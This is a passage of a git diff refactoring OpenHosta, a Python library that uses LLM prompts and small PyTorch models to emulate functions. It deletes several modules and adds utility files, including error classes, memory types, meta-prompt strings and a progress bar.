- def __init__(self, config, hidden_dir):
- super().__init__()
- self.hidden_dir = hidden_dir
- self.path = hidden_dir+"/config.json"
- if config == None:
- try:
- with open(self.path, 'r') as f:
- self.config = json.load(f)
- except Exception as e:
- raise Exception("Config file not found please check the path : ", self.path)
- else:
- self.config = config
-
- self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
- self.create_model(self.config)
-
- self.loss = nn.SmoothL1Loss()
- self.optimizer = torch.optim.AdamW(self.parameters(), lr=0.001)
- self.to(self.device)
-
- def create_model(self, config):
-
- input_size = config["input_size"]
- output_size = config["output_size"]
-
- hidden_sizes = []
- for key in config:
- if key.startswith("hidden_size_"):
- layer_num_str = key.split("_")[-1]
- if layer_num_str.isdigit():
- layer_num = int(layer_num_str)
- hidden_sizes.append((layer_num, config[key]))
- hidden_sizes.sort(key=lambda x: x[0])
-
- layer_sizes = [input_size] + [size for _, size in hidden_sizes] + [output_size]
-
- for idx in range(len(layer_sizes) - 1):
- in_features = layer_sizes[idx]
- out_features = layer_sizes[idx + 1]
- self.add_module(f"fc{idx + 1}", nn.Linear(in_features, out_features, dtype=torch.float32))
-
- return
-
- def forward(self, x):
- x = x.to(self.device)
- num_layers = len(self.config) - 4
- for idx in range(1, num_layers):
- layer = getattr(self, f"fc{idx}")
- x = F.relu(layer(x))
-
- layer = getattr(self, f"fc{num_layers}")
- x = layer(x)
- return x
-
-
- def train(self, train, val, epochs, path, verbose=False, get_loss=None, continue_training=False):
- get_loss=0.0 if get_loss is None else get_loss
-
- if continue_training:
- try:
- self.load_state_dict(torch.load(path+"/model.pth", weights_only=True))
- if verbose:
- print(f"\033[93mModel loaded from {path}/model.pth\033[0m")
- except Exception as e:
- raise Exception(f"Model weight not found at {path}/model.pth")
-
- total_start = time.time()
-
- for epoch in range(epochs):
- epoch_start = time.time()
- for X_train, y_train in train:
- X_train, y_train = X_train.to(self.device), y_train.to(self.device)
- self.optimizer.zero_grad()
- output = self.forward(X_train)
-
- loss = self.loss(output, y_train)
- loss.backward()
- self.optimizer.step()
- epoch_end = time.time()
- epoch_time = epoch_end - epoch_start
- if verbose:
- print(f"\033[94m{epoch}/{epochs} -> Loss: {loss.item()} in {epoch_time} sec\033[0m", flush=True)
-
- if loss.item() < get_loss:
- if verbose:
- print(f"\033[93mLoss target achieved at epoch {epoch} with loss {loss.item()} in {epoch_time} sec\033[0m", flush=True)
- break
-
- total_end = time.time()
- total_time = total_end - total_start
- if verbose:
- print(f"\033[92mTraining complete : Loss: {loss.item()} in a total of {total_time} sec\033[0m", flush=True)
-
- torch.save(self.state_dict(), path+"/model.pth")
diff --git a/src/OpenHosta/predict.py b/src/OpenHosta/predict.py
deleted file mode 100644
index c468a02..0000000
--- a/src/OpenHosta/predict.py
+++ /dev/null
@@ -1,195 +0,0 @@
-import os
-
-import pickle
-from .cache import Hostacache
-from .builder import Builder
-from .datapreparator import Datapreparator
-from .example import type_verificator
-from .emulate import _exec_emulate
-
-from typing import Any
-import inspect
-
-CACHE_DIR = "__hostacache__"
-os.makedirs(CACHE_DIR, exist_ok=True)
-
-def _exec_predict(
- _function_infos: dict = None,
- _function_obj: object = None,
-
- encoder = None,
- decoder = None,
- verbose: bool = False,
- prediction: list = [],
- complexity: int = None,
- config: dict = None,
- optimizer: str = None,
- loss: str = None,
- epochs: int = None,
- get_loss: float = 0.0,
- batch_size: int = None,
- force_train: bool = False,
- norm_max: float = None,
- norm_min: float = None,
- continue_training: bool = False,
- normalization: bool = False
-):
- hidden_dir = os.path.join(CACHE_DIR, f".model_{_function_obj.__name__}_{_function_infos['hash_function']}")
- os.makedirs(hidden_dir, exist_ok=True)
-
- config_path = os.path.join(hidden_dir, "config.json")
- weight_path = os.path.join(hidden_dir, "model.pth")
- normalisation_path = os.path.join(hidden_dir, "normalisation.json")
-
- preparator = Datapreparator(norm_max, norm_min, encoder, decoder)
- builder = Builder(hidden_dir)
-
- if not os.path.exists(config_path) or not os.path.exists(weight_path) or force_train==True:
-
- train, val = preparator.prepare(_function_infos, prediction)
-
- if normalization:
- train, val = preparator.normalize_dataset(train,val)
- preparator.save_normalization_params(normalisation_path)
- len_input = len(train[0][0])
- len_output = len(train[0][1])
- builder.build(len_input, len_output, complexity, config, optimizer, loss)
- if batch_size is None:
- batch_size = int(0.05 * len(train)) if 0.05 * len(train) > 1 else len(train) # 5% of the dataset or len(train) if len(train)
- else:
- batch_size = batch_size
- save_len = len(train)
- train, eval = preparator.split(train, val, batch_size)
- epochs = int(2*save_len / batch_size if batch_size != save_len else 2*save_len) if epochs is None else epochs
- assert epochs > 0, "epochs must be greater than 0 now it's {epochs}"
- builder.trains(config, train, eval, epochs=epochs, verbose=verbose, get_loss=get_loss, continue_training=continue_training)
- else:
- if verbose:
- print("\033[93mModel already trained, skipping training\033[0m")
- if normalization:
- preparator.load_normalization_params(normalisation_path)
- if _function_infos["function_args"] != {}:
- inference = preparator.prepare_input(_function_infos["function_args"])
- if normalization:
- inference = preparator.normalize_inference(inference)
- torch_inference = preparator.convert(inference)
-
- prediction = builder.load_inference(config_path, weight_path, torch_inference)
- if normalization:
- prediction_denormalize = preparator.denormalize_prediction(prediction)
- result = float(prediction_denormalize[0])
- else:
- result = float(prediction.detach().cpu().numpy()[0])
- return result
-
-
-def continue_train(func_obj, epochs=None, get_loss=None, verbose=False):
- """
- Continue the training of the model
- - Reload a pth and add a dataset or not for the model
- save a new pth after the training decided in the emulate or not or in this function also (diff parameters
- of training and not architecture)
- """
- infos_cache = load_cache(func_obj)
- return _exec_predict(_function_infos=infos_cache, _function_obj=func_obj, force_train=True ,continue_training=True, epochs=epochs, get_loss=get_loss, verbose=verbose)
-
-
-def get_input_types_from_signature(func_obj):
- """
- Extract input type from function signature
- """
- signature = inspect.signature(func_obj)
- input_type = {}
- for name, param in signature.parameters.items():
- if param.annotation != inspect.Parameter.empty:
- input_type[name] = param.annotation
- else:
- input_type[name] = Any
- return input_type
-
-
-def emulate_verificator(args, kwargs, input_type, func, example_dict):
- """
- Vérifie les types des arguments positionnels et nommés lors de l'appel à emulate.
- Met à jour example_dict avec les valeurs validées.
- """
- param_names = list(input_type.keys())
-
- total_args_provided = len(args) + len(kwargs)
- total_args_expected = len(param_names)
-
- if total_args_provided != total_args_expected:
- raise ValueError(
- f"Incorrect number of arguments for function '{func.__name__}', "
- f"expected {total_args_expected}, got {total_args_provided}."
- )
-
- for i, arg in enumerate(args):
- param_name = param_names[i]
- expected_type = input_type[param_name]
-
- if not isinstance(arg, expected_type):
- raise TypeError(
- f"Positional argument '{param_name}'={arg} does not match the expected type "
- f"{expected_type} in function '{func.__name__}'."
- )
- example_dict[param_name] = arg
-
- for key, value in kwargs.items():
- if key not in input_type:
- raise ValueError(
- f"Unexpected named argument '{key}' for function '{func.__name__}'."
- )
- expected_type = input_type[key]
-
- if not isinstance(value, expected_type):
- raise TypeError(
- f"Named argument '{key}'={value} does not match the expected type "
- f"{expected_type} in function '{func.__name__}'."
- )
- example_dict[key] = value
-
-
-def to_emulate(*args, func_obj, model=None, l_creativity=None, l_diversity=None, **kwargs):
- """
- Emulate the function with the given arguments and keyword arguments.
- """
- infos_cache = load_cache(func_obj)
- input_type = get_input_types_from_signature(func_obj)
-
- example_dict = {}
-
- emulate_verificator(args=args, kwargs=kwargs, input_type=input_type, func=func_obj, example_dict=example_dict)
- infos_cache["function_args"] = example_dict
- infos_cache["function_call"] = f"{func_obj.__name__}({', '.join([f'{k}={v}' for k, v in example_dict.items()])})"
- return _exec_emulate(_infos=infos_cache, _obj=func_obj, model=model, l_creativity=l_creativity, l_diversity=l_diversity)
-
-
-def load_cache(func_obj):
- func_name = func_obj.__name__
- path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
-
- if os.path.exists(path_name):
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
- return cached_data
- else:
- raise ValueError(f"Cache not found for function '{func_name}'.")
-
-
-def retrain(func_obj=None, force_train=True, epochs=None, get_loss=None, verbose=False):
-
- infos_cache = load_cache(func_obj)
- return _exec_predict(_function_infos=infos_cache, _function_obj=func_obj, force_train=force_train, epochs=epochs, get_loss=get_loss, verbose=verbose)
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/src/OpenHosta/prompt.py b/src/OpenHosta/prompt.py
deleted file mode 100644
index a6be5cd..0000000
--- a/src/OpenHosta/prompt.py
+++ /dev/null
@@ -1,97 +0,0 @@
-import os
-import json
-import sys
-
-
-class PromptMananger:
- def __init__(self, json_path=None):
- if json_path is None:
- try:
- self.path = os.path.join(os.path.dirname(__file__), "prompt.json")
- except Exception as e:
- self.path = ""
- sys.stderr.write(f"[JSON_ERROR] Impossible to find prompt.json:\n{e}")
- return
- else:
- self.path = json_path
-
- try:
- with open(self.path, "r", encoding="utf-8") as file:
- self.json = json.load(file)
- self.prompts = {item["key"]: item for item in self.json["prompts"]}
- except FileNotFoundError:
- sys.stderr.write(f"[JSON_ERROR] File not found: {self.path}\n")
- self.prompts = {}
- except json.JSONDecodeError as e:
- sys.stderr.write(f"[JSON_ERROR] JSON decode error:\n{e}\n")
- self.prompts = {}
-
- def get_prompt(self, key):
- prompt = self.prompts.get(key)
- if prompt:
- return prompt["text"]
- sys.stderr.write(f"[JSON_ERROR] Prompt not found\n")
- return None
-
- def get_prompt_details(self, key):
- prompt = self.prompts.get(key)
- if prompt:
- return prompt
- sys.stderr.write(f"[JSON_ERROR] Prompt not found\n")
- return None
-
- def set_prompt(self, name: str, category: str, version: str, filepath: str):
- json_filepath = "prompt.json"
- new = {"key": "", "text": "", "category": "", "version": ""}
-
- try:
- with open(filepath, "r", encoding="utf-8") as file:
- prompt = file.read()
- except FileNotFoundError:
- sys.stderr.write(f"File {filepath} not found.")
- except IOError as e:
- sys.stderr.write(f"File error: {e}")
- else:
- try:
- with open(json_filepath, "r", encoding="utf-8") as json_file:
- data = json.load(json_file)
- except FileNotFoundError:
- sys.stderr.write(f"File {json_filepath} not found.")
- except IOError as e:
- sys.stderr.write(f"File error: {e}")
- except Exception as e:
- sys.stderr.write(e)
- else:
- new["key"], new["category"], new["version"] = name, category, version
- new["text"] = prompt
-
- found = False
- for elem in data["prompts"]:
- if elem["key"] == new["key"]:
- elem["text"] = new["text"]
- elem["version"] = new["version"]
- found = True
- break
-
- if not found:
- data["prompts"].append(new)
-
- try:
- with open(json_filepath, "w", encoding="utf-8") as json_file:
- json.dump(data, json_file, ensure_ascii=False, indent=4)
- except FileNotFoundError:
- sys.stderr.write(f"File {json_filepath} not found.")
- except IOError as e:
- sys.stderr.write(f"File error: {e}")
- except Exception as e:
- sys.stderr.write(e)
- else:
- print(f"{name} prompt has been added to {json_filepath}")
-
- def show_prompt(self, key):
- prompt = self.prompts.get(key)
- if prompt:
- print(prompt["text"])
- return prompt["text"]
- sys.stderr.write(f"[JSON_ERROR] Prompt not found\n")
- return None
diff --git a/src/OpenHosta/requirements.txt b/src/OpenHosta/requirements.txt
deleted file mode 100644
index 32c71f3..0000000
--- a/src/OpenHosta/requirements.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-Flask==3.0.3
-PyYAML==6.0.2
-pydantic==2.8.2
-Jinja2==3.1.4
-pyreadline3==3.4.1
\ No newline at end of file
diff --git a/src/OpenHosta/thought.py b/src/OpenHosta/thought.py
deleted file mode 100644
index ef059de..0000000
--- a/src/OpenHosta/thought.py
+++ /dev/null
@@ -1,76 +0,0 @@
-import sys
-import json
-from pydoc import locate
-from pydantic import create_model
-
-from .emulate import _exec_emulate
-from .config import DefaultManager
-from .prompt import PromptMananger
-
-l_default = DefaultManager.get_default_model()
-_x = PromptMananger()
-_thought_sys_prompt = _x.get_prompt("thought")
-
-
-def thought(key):
- _function_infos = {
- "function_def": "",
- "function_call": "",
- "return_type": None,
- "return_type": None,
- "ho_example": None,
- "function_locals": None,
- "return_caller": None,
- }
-
- def inner_func(*args, **kwargs):
- global l_default, _thought_sys_prompt
-
- l_user_prompt = (
- "Here's the function behavior:\n"
- + f"{key}\n"
- + "Here's the arguments:\n"
- + f"{args}\n"
- )
-
- response = l_default.api_call(
- sys_prompt=_thought_sys_prompt,
- user_prompt=l_user_prompt,
- creativity=0.5,
- diversity=0.5,
- )
-
- data = response.json()
- type_json = data["choices"][0]["message"]["content"]
- type_dict = json.loads(type_json)
- type_str = str(type_dict["type"])
-
- _function_infos["return_caller"] = locate(type_str)
- setattr(inner_func, "_return_type", _function_infos["return_caller"])
-
- new_model = create_model(
- "Hosta_return_shema",
- return_hosta_type=(_function_infos["return_caller"], ...),
- )
- _function_infos["return_type"] = new_model.model_json_schema()
-
- typed = (
- str(args)
- + "\n"
- + 'Here\'s the return type that must respect for your response. The python type is in the key "type" of this JSON schema:\n'
- + str(type_dict)
- + "\n"
- )
-
- try:
- _function_infos["function_def"] = key
- _function_infos["function_call"] = typed
- result = _exec_emulate(_function_infos, inner_func)
- except Exception as e:
- sys.stderr.write(f"{e}")
- sys.stderr.write("[LMDA_ERROR]")
- result = None
- return result
-
- return inner_func
-
\ No newline at end of file
diff --git a/src/OpenHosta/trainset.py b/src/OpenHosta/trainset.py
deleted file mode 100644
index c2b1cfc..0000000
--- a/src/OpenHosta/trainset.py
+++ /dev/null
@@ -1,59 +0,0 @@
-import inspect
-
-from .cache import Hostacache
-from .example import type_verificator
-from .config import DefaultManager
-from .predict import load_cache
-
-l_default = DefaultManager.get_default_model()
-
-class TrainingSet():
- def __init__(self, func : callable):
- assert callable(func), "Please provide an hosta-injected function"
- self.func = func
- self.infos_cache = None
-
- def visualize(self):
- """
- function for visualize the training set idk how for now
- maybe let the hostashpère do it
- """
- hosta_cache = load_cache(self.func)
- print("ho_example:")
- for i in range(len(hosta_cache["ho_example"])):
- print(hosta_cache["ho_example"][i])
- print("ho_data:")
- for i in range(len(hosta_cache["ho_data"])):
- print(hosta_cache["ho_data"][i])
- return [hosta_cache["ho_example"], hosta_cache["ho_data"]]
-
- def add(self, *args, hosta_out=None,**kwargs):
- """
- function for add an example to the training set
- """
- input_type = {}
- output_type = {}
- data_dict = {}
- hosta_func = self.func
-
- if hosta_out is None:
- raise ValueError("Please provide hosta_out for output.")
- if hosta_func is None:
- raise ValueError("Please provide hosta_func for specifying the function")
- elif callable(hosta_func):
- func = hosta_func
- else:
- raise ValueError("Please provide hosta_func for specifying the function")
-
- try:
- sig = inspect.signature(func)
- for param in sig.parameters.values():
- input_type[param.name] = param.annotation
- output_type["hosta_out"] = sig.return_annotation
- except:
- raise ValueError("Function does not have a signature")
-
- type_verificator(args, kwargs, input_type, output_type, hosta_out, func, data_dict)
- cache_id = "ho_data"
- cache = Hostacache(func, cache_id, data_dict)
- cache.create_hosta_cache()
diff --git a/src/OpenHosta/utils/__init__.py b/src/OpenHosta/utils/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/errors.py b/src/OpenHosta/utils/errors.py
similarity index 58%
rename from src/OpenHosta/errors.py
rename to src/OpenHosta/utils/errors.py
index 92bd1ff..8820269 100644
--- a/src/OpenHosta/errors.py
+++ b/src/OpenHosta/utils/errors.py
@@ -1,29 +1,44 @@
+from __future__ import annotations
+
from typing import Literal
__all__ = (
"RequestError",
"ApiKeyError",
- "FrameError"
+ "FrameError",
+ "InvalidStructureError"
)
OhErrorCodes = Literal[
""
]
+
class OhErrorMixin(Exception):
""" Base class for other customs exceptions """
- def __init__(self, message:str):
+
+ def __init__(self, message: str):
super().__init__(message)
self.message = message
-
- def __str__(self)->str:
+
+ def __str__(self) -> str:
return f"{self.message}\n"
-
+
+
class RequestError(OhErrorMixin):
""" Raised when a request to a llm went wrong """
+
class ApiKeyError(RequestError):
""" Raised when API key is missing or incorrect """
+
class FrameError(OhErrorMixin):
- """ Raised when the frame inspection fail """
\ No newline at end of file
+ """ Raised when the frame inspection fail """
+
+
+class InvalidStructureError(OhErrorMixin):
+ """ Raised when the bosy's function aren't placed correctly """
+
+
+# agent creation + multimodal + tools
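Since the hierarchy above roots every custom error in `OhErrorMixin`, a single `except RequestError` handler also catches `ApiKeyError`. A minimal standalone sketch of that behavior (illustrative only, not the packaged module):

```python
class OhErrorMixin(Exception):
    """Base class mirroring the mixin above."""

    def __init__(self, message: str):
        super().__init__(message)
        self.message = message

    def __str__(self) -> str:
        return f"{self.message}\n"


class RequestError(OhErrorMixin):
    """Raised when a request to an LLM goes wrong."""


class ApiKeyError(RequestError):
    """Raised when the API key is missing or incorrect."""


try:
    raise ApiKeyError("missing API key")
except RequestError as err:  # the parent class catches the subclass
    caught = str(err)

print(caught)
```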
diff --git a/src/OpenHosta/utils/hosta_type.py b/src/OpenHosta/utils/hosta_type.py
new file mode 100644
index 0000000..87b9874
--- /dev/null
+++ b/src/OpenHosta/utils/hosta_type.py
@@ -0,0 +1,28 @@
+from __future__ import annotations
+
+from dataclasses import dataclass
+from typing import Any, Literal, Union, TypedDict
+
+
+class ExampleType(TypedDict):
+ in_: Any
+ out: Any
+
+
+class CotType(TypedDict):
+ task: str
+
+
+class UseType(TypedDict):
+ pass
+
+
+MemKey = Literal["ex", "cot", "use"]
+MemValue = Union[CotType, ExampleType, UseType]
+
+
+@dataclass
+class MemoryNode:
+ key: MemKey
+ id: int
+ value: MemValue
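A `MemoryNode` ties one of the `MemKey` literals to a typed payload. A self-contained sketch of how the pieces above fit together (simplifying `MemValue` to `Any` for brevity):

```python
from dataclasses import dataclass
from typing import Any, Literal, TypedDict


class ExampleType(TypedDict):
    in_: Any
    out: Any


MemKey = Literal["ex", "cot", "use"]


@dataclass
class MemoryNode:
    key: MemKey
    id: int
    value: Any  # simplified from the MemValue union for this sketch


# an "ex" node carrying one input/output example
node = MemoryNode(key="ex", id=0, value=ExampleType(in_=3, out=9))
print(node.key, node.value["out"])
```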
diff --git a/src/OpenHosta/utils/import_handler.py b/src/OpenHosta/utils/import_handler.py
new file mode 100644
index 0000000..6694f2b
--- /dev/null
+++ b/src/OpenHosta/utils/import_handler.py
@@ -0,0 +1,13 @@
+from __future__ import annotations
+
+__all__ = (
+    "is_pydantic",
+    "is_torch",
+)
+
+is_pydantic = False
+try:
+    import pydantic
+    is_pydantic = True
+except ImportError:
+    is_pydantic = False
+
+is_torch = False
+try:
+    import torch
+    is_torch = True
+except ImportError:
+    is_torch = False
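The try/except availability flag used above can be generalized into a small helper. This hypothetical `optional_import` is not part of OpenHosta, just an illustration of the same pattern:

```python
def optional_import(name):
    """Return (module, True) if importable, else (None, False)."""
    try:
        module = __import__(name)
        return module, True
    except ImportError:
        return None, False


# stdlib module: always available
_, has_json = optional_import("json")
# a name that should not resolve anywhere
_, has_missing = optional_import("definitely_not_a_real_module_xyz")
print(has_json, has_missing)
```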
diff --git a/src/OpenHosta/utils/meta_prompt.py b/src/OpenHosta/utils/meta_prompt.py
new file mode 100644
index 0000000..7791ca0
--- /dev/null
+++ b/src/OpenHosta/utils/meta_prompt.py
@@ -0,0 +1,73 @@
+from __future__ import annotations
+
+from typing import List, Callable
+
+def print_last_prompt(func:Callable):
+ if hasattr(func, "_last_request"):
+ if "sys_prompt" in func._last_request:
+ print("[SYSTEM PROMPT]")
+ print(func._last_request["sys_prompt"])
+ if "user_prompt" in func._last_request:
+ print("[USER PROMPT]")
+ print(func._last_request["user_prompt"])
+ else:
+ print("No prompt found for this function.")
+
+class MetaPrompt:
+
+ def __init__(self, shards: List[str]):
+ for shard in shards:
+ if not isinstance(shard, str):
+ raise ValueError(
+ "[MetaPrompt.__init__] Shards must be strings.")
+ try:
+            setattr(self, shard.upper(), "")
+        except Exception:
+            raise AttributeError(
+                f"[MetaPrompt.__init__] Failed to initialize the {shard} attribute")
+
+ def __repr__(self):
+ ctx = {}
+ for key, value in self.__dict__.items():
+ if key.startswith("CTX_"):
+ ctx[key] = value
+ return "\n".join(ctx.values())
+
+
+EMULATE_PROMPT = MetaPrompt([
+ "CTX_MAIN",
+ "CTX_SEP1"
+ "CTX_EXAMPLE",
+ "CTX_SEP2"
+ "PRE_DEF",
+ "PRE_TYPE",
+ "PRE_SCHEMA",
+ "PRE_LOCALS",
+ "PRE_SELF",
+ "PRE_EXAMPLE",
+ "PRE_COT",
+ "USER_SEP"
+])
+EMULATE_PROMPT.CTX_MAIN = "## Context\n\nYou will act as an emulator of impossible-to-code functions. I will provide you with the description of the function using Python's way of declaring functions, but I won't provide the function body as I don't know how to code it. It might even be impossible to code. Therefore, you should not try to write the body. Instead, directly imagine the function output.\n\nIn the conversation, I will directly write the function call as if it was called in Python. You should directly answer with whatever you believe would be a good return for the function.\n\nIf the output is documented as a Python structure, you should translate it to JSON.\nYou should encode the return in valid JSON format, without comments, using the following format:\n```\n{\"return\":\"...\"}\n```\n\nThe output must be of the same type as that specified in the function call. If you don't have enough information or don't know how to answer, the output should be “None”. \n\nAny assumptions made should be reasonable based on the provided function description and should take into account the error handling of the function." # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.CTX_SEP1 = "\n---\n" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.CTX_EXAMPLE = "## Examples\n\n**Example function definition:**\n```python\ndef example_function(a: int, b: dict) -> int:\n\t\"\"\"\n\tThis is an example function.\n\tIt adds two numbers.\n\t\"\"\"\n\treturn emulate()\n```\n\n**Example emulated function call:**\n```python\nresult = example_function(3, {\"value\": 7})\n```\n\n**Expected JSON output:**\n{\"return\": 10}" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.CTX_SEP2 = "\n---\n\n## Function infos\n" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_DEF = "Here's the function definition:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_TYPE = "Here's the type annotation of the function:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_SCHEMA = "If it isn't a native type, here's a schema describing the type annotation:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_LOCALS = "Here's the function's locals variables which you can use as additional information to give your answer:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_SELF = "Here's the method's class attributs variables which you can use as additional information to give your answer:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_EXAMPLE = "Here are some examples of expected input and output:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.PRE_COT = "To solve the request, you have to follow theses intermediate steps. Give only the final result, don't give the result of theses intermediate steps:" # pylint: disable=attribute-defined-outside-init
+EMULATE_PROMPT.USER_SEP = "\n---\n" # pylint: disable=attribute-defined-outside-init
+
+THOUGHT_PROMPT = MetaPrompt([
+ "CTX_MAIN",
+ "CXT_SEP",
+ "CTX_EXAMPLE",
+ "USER_SEP"
+])
+THOUGHT_PROMPT.CTX_PROMPT = "You will act as an emulator of impossible-to-code functions. I will provide you with the description of the function using Python's way of declaring functions, but I won't provide the function body as I don't know how to code it. It might even be impossible to code. Therefore, you should not try to write the body. Instead, directly imagine the function output.\n\nIn the conversation, I will directly write the function behavior as a sentence, and the argument passed to the function.\n\nYour objective is to find the Python data type to be returned by the function. Take into account the function's behavior, the wording and intent of the sentence, and the arguments given. You must give your answer without any comment and in the following JSON schema:\n```\n{\"type\": \"\"}\n```\n\nTo fill in the type key, you need to follow Python syntax, such as \"int\" or \"str\", depending on your answer." # pylint: disable=attribute-defined-outside-init
+THOUGHT_PROMPT.CTX_SEP = "\n---\n" # pylint: disable=attribute-defined-outside-init
+THOUGHT_PROMPT.CTX_EXAMPLE = "Here are a few examples:\n\nFunction behavior: \"Is a positive number\"\nArgument: 2\nExpected response: {\"type\": \"bool\"}\n\nFunction behavior: \"Multiply a number by 2\"\nArgument: 10\nExpected response: {\"type\": \"int\"}\n\nFunction behavior: \"Reverse a string\"\nArgument: \"Hello World!\"\nExpected response: {\"type\": \"str\"}\n\nFunction behavior: \"Sorts a list in ascending order\"\nArgument: (10, 5, 7, 12, 3)\nExpected response: {\"type\": \"list\"}" # pylint: disable=attribute-defined-outside-init
+THOUGHT_PROMPT.USER_SEP = "\n---\n" # pylint: disable=attribute-defined-outside-init
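`MetaPrompt.__repr__` keeps only the attributes whose names start with `CTX_` and joins them with newlines, so the repr of a prompt object yields the context portion of the system prompt while the `PRE_*` fragments are excluded. A tiny standalone sketch of that lookup (not the library class):

```python
class MetaPromptSketch:
    """Illustrative re-implementation of the repr logic above."""

    def __repr__(self):
        # keep only the context shards, in insertion order
        ctx = {k: v for k, v in self.__dict__.items() if k.startswith("CTX_")}
        return "\n".join(ctx.values())


p = MetaPromptSketch()
p.CTX_MAIN = "## Context"
p.PRE_DEF = "Here's the function definition:"  # not a CTX_ shard: excluded
p.CTX_SEP = "---"
print(repr(p))
```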
diff --git a/src/OpenHosta/utils/progress_bar.py b/src/OpenHosta/utils/progress_bar.py
new file mode 100644
index 0000000..b5e3f96
--- /dev/null
+++ b/src/OpenHosta/utils/progress_bar.py
@@ -0,0 +1,22 @@
+
+def print_progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=25, fill='-', print_end="\r"):
+ """
+ Call in a loop to create terminal progress bar
+ @params:
+ iteration - Required : current iteration (Int)
+ total - Required : total iterations (Int)
+ prefix - Optional : prefix string (Str)
+ suffix - Optional : suffix string (Str)
+ decimals - Optional : positive number of decimals in percent complete (Int)
+ length - Optional : character length of bar (Int)
+ fill - Optional : bar fill character (Str)
+ print_end - Optional : end character (e.g. "\r", "\r\n") (Str)
+ """
+ percent = ("{0:." + str(decimals) + "f}").format(100 *
+ (iteration / float(total)))
+ filled_length = int(length * iteration // total)
+ bar = fill * filled_length + '-' * (length - filled_length)
+ print(f'\r{prefix} {bar} {percent}% {suffix}', end=print_end)
+ # Print New Line on Complete
+ if iteration == total:
+ print()
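The bar itself is simple integer arithmetic: a percentage string plus a filled segment of `length * iteration // total` characters. A standalone sketch that returns the pieces instead of printing them (note that with the default `fill='-'` above, the filled and empty segments are indistinguishable, so this sketch uses `'#'`):

```python
def render_bar(iteration, total, length=25, fill='#', pad='-'):
    """Same arithmetic as print_progress_bar above, returned instead of printed."""
    percent = "{0:.1f}".format(100 * (iteration / float(total)))
    filled_length = int(length * iteration // total)
    bar = fill * filled_length + pad * (length - filled_length)
    return bar, percent


bar, percent = render_bar(5, 10)
print(bar, percent)
```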
diff --git a/src/OpenHosta/prompt.json b/src/OpenHosta/utils/prompt.json
similarity index 85%
rename from src/OpenHosta/prompt.json
rename to src/OpenHosta/utils/prompt.json
index 9e752fd..fdfe2ce 100644
--- a/src/OpenHosta/prompt.json
+++ b/src/OpenHosta/utils/prompt.json
@@ -20,9 +20,21 @@
},
{
"key": "emulate",
- "text": "## Context\n\nYou will act as an emulator of impossible-to-code functions. I will provide you with the description of the function using Python's way of declaring functions, but I won't provide the function body as I don't know how to code it. It might even be impossible to code. Therefore, you should not try to write the body. Instead, directly imagine the function output.\n\nIn the conversation, I will directly write the function call as if it was called in Python. You should directly answer with whatever you believe would be a good return for the function.\n\nIf the output is documented as a Python structure, you should translate it to JSON.\nYou should encode the return in valid JSON format, without comments, using the following format:\n```\n{\"return\":\"...\"}\n```\n\nThe output must be of the same type as that specified in the function call. If you don't have enough information or don't know how to answer, the output should be “None”. \n\nAny assumptions made should be reasonable based on the provided function description and should take into account the error handling of the function.\n\n---\n\n## Examples\n\n**Example function definition:**\n```python\ndef example_function(a: int, b: dict) -> int:\n\t\"\"\"\n\tThis is an example function.\n\tIt adds two numbers.\n\t\"\"\"\n\treturn emulate()\n```\n\n**Example emulated function call:**\n```python\nresult = example_function(3, {\\\"value\\\": 7})\n```\n\n**Expected JSON output:**\n{\"return\": 10}\n",
+ "text": "## Context\n\nYou will act as an emulator of impossible-to-code functions. I will provide you with the description of the function using Python's way of declaring functions, but I won't provide the function body as I don't know how to code it. It might even be impossible to code. Therefore, you should not try to write the body. Instead, directly imagine the function output.\n\nIn the conversation, I will directly write the function call as if it was called in Python. You should directly answer with whatever you believe would be a good return for the function.\n\nIf the output is documented as a Python structure, you should translate it to JSON.\nYou should encode the return in valid JSON format, without comments, using the following format:\n```\n{\"return\":\"...\"}\n```\n\nThe output must be of the same type as that specified in the function call. If you don't have enough information or don't know how to answer, the output should be “None”. \n\nAny assumptions made should be reasonable based on the provided function description and should take into account the error handling of the function.\n\n---\n\n## Examples\n\n**Example function definition:**\n```python\ndef example_function(a: int, b: dict) -> int:\n\t\"\"\"\n\tThis is an example function.\n\tIt adds two numbers.\n\t\"\"\"\n\treturn emulate()\n```\n\n**Example emulated function call:**\n```python\nresult = example_function(3, {\"value\": 7})\n```\n\n**Expected JSON output:**\n{\"return\": 10}\n",
"category": "executive",
"version": "v1.2"
+ },
+ {
+ "key": "synthetic_data_generator",
+ "text": "{func_name}{signature}:\n \"\"\"{docstring}\"\"\"\n\nIMPORTANT RULES:\n1. Input values should respect the type hints\n2. Output values MUST be diverse - avoid generating the same output repeatedly\n3. Each row must be in CSV format\n4. For text outputs, enclose them in double quotes\n5. NO MORE THAN 20% of outputs should be the same value\n6. Generate inputs across the entire possible range\n7. Ensure proper formatting for {return_type} output type",
+ "category": "executive",
+ "version": "v1.0"
}
]
}
\ No newline at end of file
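The `synthetic_data_generator` entry is a `str.format`-style template: `{func_name}`, `{signature}`, `{docstring}`, and `{return_type}` are filled in at call time. A hypothetical rendering with made-up values, using only the template's first and last lines:

```python
# shortened copy of the template above, for illustration only
template = ('{func_name}{signature}:\n    """{docstring}"""\n\n'
            'Ensure proper formatting for {return_type} output type')

prompt = template.format(
    func_name="add",
    signature="(a: int, b: int) -> int",
    docstring="Add two numbers.",
    return_type="int",
)
print(prompt.splitlines()[0])
```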
diff --git a/src/OpenHosta/utils/torch_nn_utils.py b/src/OpenHosta/utils/torch_nn_utils.py
new file mode 100644
index 0000000..0763130
--- /dev/null
+++ b/src/OpenHosta/utils/torch_nn_utils.py
